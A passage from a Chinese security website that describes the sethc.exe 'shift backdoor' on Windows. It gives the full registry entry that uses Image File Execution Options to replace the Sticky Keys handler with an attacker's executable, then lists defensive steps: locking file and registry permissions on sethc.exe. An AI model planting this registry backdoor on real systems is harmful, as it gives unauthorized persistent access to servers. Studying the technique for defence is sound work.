Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

sethc.exe新的镜像劫持技术和安全防御!(shift后门)

来源: 未知 分享至:

很多朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码.
5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角...
前提是先运行个p处理或reg,这个方法比较牛X..
注册表如下

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\www.xxxx.cn.exe"信息来自:http://www.3ast.com.cn

这个exe存的路径是:c:\\www.xxxx.cn.exe黑客


-----------------------------------------------------以下是安全设置---------------------------黑客
知道上边原理:就可以设置安全了....
服务器里按5下shift,出设置把所有的对号去掉.
删除所有文件安全设置下用户,加everyone设置全部拒绝
C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache的sethc.exe
修改注册表权限,同上.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe


最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史